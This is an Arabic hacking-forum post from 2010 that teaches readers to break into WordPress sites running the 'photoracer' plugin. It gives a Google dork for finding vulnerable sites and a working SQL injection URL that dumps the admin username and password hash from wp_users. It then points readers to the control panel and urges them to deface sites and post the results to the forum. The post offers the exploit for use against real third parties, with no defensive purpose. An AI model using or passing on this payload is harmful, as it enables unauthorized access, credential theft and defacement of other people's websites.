السلام عليكم ورحمه الله وبركاته .
كيفكم . أخواني إن شاء الله الكل بخير ..
اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .
ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي .
..
نبدأ بسم الله .:
أولا.:
الدوركـ .:
 |
اقتباس |
 |
|
|
|
|
|
|
|
|
|
inurl:"wp-content/plugins/photoracer/viewimg.php?id=" |
|
 |
|
 |
|
بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختار
اي واحد الي يعجبــك ..
ثانيــأ.:
الإٍستغلال .:
بتسوي كذا على طول ...:
|
|
اقتباس |
|
|
|
|
|
|
|
|
|
|
كود PHP:
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
|
|
|
|
|
|
|
يعني مثال .:
www.xxx.com/
انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..
بطلع لك الباسورد واليوزر تبع الادمن .. .:
مثال كامل . على الاستغلال .:
|
|
اقتباس |
|
|
|
|
|
|
|
|
|
|
www.xxx.com/
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users-- |
|
|
|
|
|
|
فهمـتووو كيف ياحلوين ..
ثالثـأ.:
لوحـة التحكم .:
|
|
اقتباس |
|
|
|
|
|
بس بتسوي بعد رابط الموقع هيك .:
وبتطلع لك لوحـة التحكم .....
..
يالله ، بدي اشوف اندكسات
..
أخوكم .:
بالتوفيــــــــــــــق لــكــم ..
06-15-2010, 03:16 PM
WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول
العرض الشجري